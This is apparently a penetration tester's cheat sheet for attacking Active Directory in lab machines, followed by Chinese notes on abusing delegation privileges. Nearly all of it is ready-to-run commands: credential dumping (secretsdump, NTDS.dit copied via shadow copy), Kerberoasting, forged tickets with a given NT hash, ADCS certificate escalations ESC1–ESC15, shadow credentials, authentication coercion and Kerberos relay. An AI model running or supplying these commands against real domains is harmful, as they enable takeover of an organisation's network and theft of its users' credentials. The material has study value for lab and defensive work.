documents https://github.com/CravateRouge/bloodyAD/wiki/User-Guide https://www.netexec.wiki/ https://bloodhound.specterops.io/resources/edges/overview
misc sudo timedatectl set-ntp off sudo timedatectl set-ntp on sudo ntpdate 10.129.236.176 echo "10.129.176.30 baby.vl BabyDC.baby.vl" | sudo tee -a /etc/hosts export KRB5CCNAME= unset KRB5CCNAME echo -n 'P@ssw0rd' | iconv -f UTF-8 -t UTF-16LE | openssl dgst -md4 | awk '{print $2}' nxc smb 10.129.95.210 -u '' -p '' --shares nxc smb 10.129.95.210 -u 'guest' -p '' --shares nxc smb 10.129.95.210 -u '' -p '' --rid-brute nxc smb 10.129.95.210 -u '' -p '' --users nxc smb 10.129.95.210 -u '' -p '' --groups nxc smb 10.129.95.210 -u '' -p '' --pass-pol ldapsearch -H ldap://10.129.95.210 -x -b "DC=htb,DC=local" "(objectClass=person)" rpcclient -U "" -N 10.129.95.210 enumdomusers enumdomgroups querydispinfo
bloodhound-ce bloodhound-ce-python -d <FQDN> -dc <DC-FQDN> -ns <dc-ip> --dns-tcp -u <user> -p <pass> -c ALL --zip rusthound-ce --domain <FQDN> -u <user> -p <pass> --zip
bloodyAD bloodyAD --dc-ip <dc-ip> -d <FQDN> -u <user> -p <pass/hash> [-k] get object 'Domain Admins' --attr member get object 'Admin' --attr 'servicePrincipalName' get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065 --base 'CN=Deleted Objects,DC=tombwatcher,DC=htb' --filter "(&(isDeleted=TRUE)(sAMAccountName=*))" --attr sAMAccountName set password 'Admin' P@ssw0rd set object 'Admin' 'servicePrincipalName' -v 'http/whatever' set restore <target> add groupMember 'Domain Admins' hacker add shadowCredentials <target> remove uac <target> -f ACCOUNTDISABLE
impacket impacket-smbclient <FQDN>/<user>:<pass>@10.129.234.44 impacket-GetNPUsers impacket-GetUserSPNs -outputfile kerberoast.txt -request -dc-ip <dc-ip> <FQDN>/<user>:<pass> impacket-changepasswd -newpass Abc@123 -protocol rpc-samr <FQDN>/<user>:<pass>@<ip> impacket-reg <FQDN>/<user>:'Abc@123'@<ip> backup -o 'c:\programdata' impacket-getTGT -dc-ip <dc-ip> <FQDN>/<user>:<pass> impacket-getST -spn <SPN> -impersonate Administrator -altservice 'cifs' -hashes :xxx <FQDN>/'<user> impacket-getST -spn <SPN> -impersonate Administrator -dc-ip <dc-ip> <FQDN>/<user>:<pass> impacket-secretsdump -sam SAM.save -system SYSTEM.save LOCAL impacket-secretsdump -k -no-pass [email protected] impacket-findDelegation -dc-ip <dc-ip> <FQDN>/<user>:<pass> impacket-addcomputer -computer-name 'test$' -computer-pass 'Asd@123' -dc-ip <dc-ip> <FQDN>/<user>:<pass> impacket-dacledit -dc-ip <dc-ip> -principal john -target-dn 'CN=Deleted Objects,DC=tombwatcher,DC=htb' -action read <FQDN>/<user>:<pass> impacket-dacledit -dc-ip <dc-ip> -principal judith -target <target> -action 'write' -rights 'WriteMembers' <FQDN>/<user>:<pass> impacket-rbcd -dc-ip <dc-ip> -delegate-to <target> -delegate-from <something> -action write <FQDN>/<user>:<pass> impacket-describeTicket <some.ccache> impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -spn MSSQLSvc/breachdc.breach.vl Administrator impacket-owneredit -dc-ip <dc-ip> -action write -new-owner <some-user> -target <target> <FQDN>/<user>:<pass>
certipy certipy-ad find -u 'operator' -p 'operator' -dc-ip 10.129.7.88 -vulnerable -stdout -enabled -hide-admins certipy-ad cert -pfx administrator.pfx -nokey -out administrator.crt certipy-ad cert -pfx administrator.pfx -nocert -out administrator.key passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target trainee -elevate -domain retro.vl -dc-host 10.129.234.44 certipy-ad shadow auto -dc-ip 10.129.236.176 -u SAM -p 'P@ssw0rd' -account john
keycred keycred list --scheme ldap --dc 10.129.234.69 -u 'delegate.vl\A.Briggs' -p 'pass' -t 'N.Thompson' keycred add --scheme ldap --dc DC1.delegate.vl -u 'delegate.vl\A.Briggs' -p 'pass' -t 'N.Thompson' keycred auth --scheme ldap --dc DC1.delegate.vl -u 'delegate.vl\A.Briggs' -p 'pass' --pfx N.Thompson_2.pfx keycred clear --scheme ldap --dc 10.129.234.69 -u 'delegate.vl\A.Briggs' -p 'pass' -t 'N.Thompson'
NTDS ```backup.txt set verbose on set context persistent nowriters set metadata C:\Windows\Temp\0xdf.cab add volume c: alias 0xdf create expose %0xdf% z: ``` diskshadow /s C:\programdata\backup.txt robocopy /b Z:\Windows\ntds . ntds.dit
gettgtpkinit.py -cert-pem N7JwTHYi_cert.pem -key-pem N7JwTHYi_priv.pem -dc-ip 10.129.236.176 export KRB5CCNAME=raj.ccache getnthash.py -key 56b304876557c0cc53482e6aaadf510058c4baf2d4be93b85b39fae511f9d2d3 tombwatcher.htb/john
coerce auth dfscoerce.py -k -no-pass -dc-ip 10.129.236.109 -target-ip 10.129.236.109 -d cicada.vl 'DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' DC-JPQ225.cicada.vl
Relay kerberos: krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv' --adcs --template DomainController -v 'DC-JPQ225$' addspn.py -dc-ip 10.129.234.118 -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/test.delegate.vl' -t 'test$' dc1.delegate.vl dnstool.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -dc-ip 10.129.234.118 -dns-ip 10.129.234.118 --tcp -r "test.delegate.vl" --type A -d 10.10.14.95 --action add dc1.delegate.vl
nxc nxc ldap <ip> -u '' -p '' --query "(sAMAccountName=*)" "" nxc ldap <ip> -u <user> -p <pass> --gmsa nxc ldap <ip> -u <user> -p <pass> --groups nxc winrm <ip> -u <user> -p <pass> -X "hostname"
evil-winrm evil-winrm -i <ip/hostname> -u <user> -p <pass>
ldapsearch # null session ldapsearch -H ldap://10.10.117.140 -x -s base namingcontexts ldapsearch -H ldap://10.10.117.140 -x -b "DC=baby,DC=vl" nxc ldap 10.129.176.30 -u '' -p '' --query "(sAMAccountName=*)" "" > ldap.txt ldapsearch -H ldap://10.10.117.140 -x -b "DC=baby,DC=vl" "(objectClass=person)" ldapsearch -H ldap://10.10.117.140 -x -b "DC=baby,DC=vl" | grep -E "(sAMAccountName|description)" # pre set windows 2000 ldapsearch -H ldap://10.10.85.6 -x -D 'retro\trainee' -w 'trainee' -b "DC=retro,DC=vl" "(userAccountControl=4128)" # ADCS (objectClass=pKIEnrollmentService)
ADCS ESC1 certipy-ad req -u <user> -p <password> -dc-ip <dc-ip> -ca AUTHORITY-CA [-target <DC-FQDN>] -template CorpVPN -upn [email protected] [-sid xxxx] certipy-ad auth -pfx administrator.pfx -dc-ip <dc-ip>
ESC4 certipy-ad template -u <user> -p <password> -dc-ip <dc-ip> -template SendaiComputer -write-default-configuration -no-save Then attack with ESC1
ESC7 certipy-ad ca -u '<user>' -p <password> -dc-ip <dc-ip> -ca '<CA-name>' -add-officer <user> certipy-ad ca -u '<user>' -p <password> -dc-ip <dc-ip> -ca '<CA-name>' -enable-template SubCA certipy-ad req -u '<user>' -p <password> -dc-ip <dc-ip> -ca '<CA-name>' -template SubCA -upn [email protected] certipy-ad ca -u '<user>' -p <password> -dc-ip <dc-ip> -ca '<CA-name>' -issue-request 19 certipy-ad req -u '<user>' -p <password> -dc-ip <dc-ip> -ca '<CA-name>' -retrieve 19 certipy-ad auth -pfx administrator.pfx -dc-ip <dc-ip>
ESC8 kerberos relay: dnstool.py -u <user> -p <password> -k -dc-ip <dc-ip> -dns-ip <dc-ip> --tcp -r "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" -d <hacker-ip> --action add <target-HOST> krbrelayx.py -t 'http://dc.cicada.vl/certsrv' --adcs --template DomainController -v 'DC$' dfscoerce.py -k -no-pass -dc-ip <dc-ip> -target-ip <target-ip> -d <FQDN> certipy-ad auth -pfx administrator.pfx -dc-ip <dc-ip>
ESC15 EXP A: certipy-ad req -u <user> -p <password> -dc-ip <dc-ip> -target dc01.tombwatcher.htb -ca tombwatcher-CA-1 -template WebServer -upn [email protected] -application-policies 'Client Authentication' certipy-ad auth -pfx administrator.pfx -dc-ip <dc-ip> EXP B: certipy-ad req -u <user> -p <password> -dc-ip <dc-ip> -target dc01.tombwatcher.htb -ca tombwatcher-CA-1 -template WebServer -upn [email protected] -application-policies 'Certificate Request Agent' certipy-ad req -u <user> -p <password> -dc-ip <dc-ip> -target dc01.tombwatcher.htb -ca tombwatcher-CA-1 -template User -pfx administrator.pfx -on-behalf-of 'tombwatcher\Administrator' certipy-ad auth -pfx administrator.pfx -dc-ip <dc-ip>
KDC_ERR_PADATA_TYPE_NOSUPP certipy-ad cert -pfx administrator.pfx -nokey -out administrator.crt certipy-ad cert -pfx administrator.pfx -nocert -out administrator.key RBCD: passthecert.py -crt administrator.crt -key administrator.key -domain <FQDN> -dc-ip <dc-ip> -action write_rbcd -delegate-from 'hack$' -delegate-to 'DC$' DcSync: passthecert.py -crt administrator.crt -key administrator.key -domain <FQDN> -dc-ip <dc-ip> -action modify_user -target trainee -elevate
SeEnableDelegationPrivilege特权利用细节 1.修改 非约束委派、约束委派 相关属性的必要条件是需要SeEnableDelegationPrivilege特权,资源约束委派不需要特权 2.userAccountControl中关于委派的标志: TRUSTED_FOR_DELEGATION - 非约束性 TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION - 约束性 3.约束性委派还需要额外配置msDS-AllowedToDelegateTo属性 情景: A.Briggs 对 N.Thompson 有 GenericWrite 权限 N.Thompson 有 SeEnableDelegationPrivilege 特权 思路: 通过A.Briggs对N.Thompson的 GenericWrite 来修改 SPN、userAccountControl、msDS-AllowedToDelegateTo 实现N.Thompson约束委派到DC,这样可以直接获取票据实现提权。 实践: 在修改过程中SPN正常修改,userAccountControl、msDS-AllowedToDelegateTo均报错:insufficientAccessRights for CN=N.Thompson,CN=Users,DC=delegate,DC=vl (Attr) — Reason:(ERROR_PRIVILEGE_NOT_HELD) A required privilege is not held by the client. 原因分析: 推断GenericWrite并不是对所有属性都能修改,在BloodHound中对GenericWrite描述为`Generic Write access grants you the ability to write to any non-protected attribute on the target object`,可见还是有某些属性是无法直接修改的。 翻看MS-ADTS Active Directory 技术规范:https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/d2435927-0999-4c62-8c6d-13ba31a52e1a中的3.1.1.5.3.1 Security Considerations中有这样一句话`If the msDS-AllowedToDelegateTo attribute is modified, then the requester MUST possess SE_ENABLE_DELEGATION_PRIVILEGE.` 即微软对于msDS-AllowedToDelegateTo属性的修改做了两道安全检测: 1. Privilege 调用者上下文Access Token是否有SE_ENABLE_DELEGATION_PRIVILEGE权限(SeEnableDelegationPrivilege) 2. ACL 是否有修改属性的权限 后续分析: 所以A.Briggs由于缺少SeEnableDelegationPrivilege导致失败。那么以N.Thompson为起点,能不能修改 自身 委派相关属性? 明显不能,因为默认情况没有修改自身属性的ACL权限 那么在MAQ!=0情况下N.Thompson能否创建新的机器账户对象。利用owner权限修改 机器账户对象 委派相关属性,然后利用约束委派攻击DC? 经过测试: 有SeEnableDelegationPrivilege时 无SeEnableDelegationPrivilege时 修改 userAccountControl 成功 修改 userAccountControl 失败 修改 msDS-AllowedToDelegateTo 失败 修改 msDS-AllowedToDelegateTo 失败 可以看到 msDS-AllowedToDelegateTo 修改失败,根据上面的两道安全检测进行假设: owner权限 不能修改msDS-AllowedToDelegateTo但可以修改userAccountControl,如果ACL有all权限或写权限可以修改成功。下面对机器账户进行对照试验 Owner权限 GenericAll权限 修改 userAccountControl 成功 修改 userAccountControl 成功 修改 msDS-AllowedToDelegateTo 失败 修改 msDS-AllowedToDelegateTo 成功 怎么利用: 既然owner下只能修改 userAccountControl,可以将 机器账户对象 修改为非约束委派,因为这样就不涉及修改msDS-AllowedToDelegateTo属性,域内添加DNS IP到攻击机,攻击机启动krbrelayx进行监听,强制域控对机器账户对象进行身份认证 总结: 修改 非约束委派、约束委派 相关属性不仅需要 SeEnableDelegationPrivilege特权,还需要具有写的高ACL权限,默认的Owner所具有的权限是无法修改的
RBCD利用细节 常规打法:MAQ!=0,添加机器账户,修改RBCD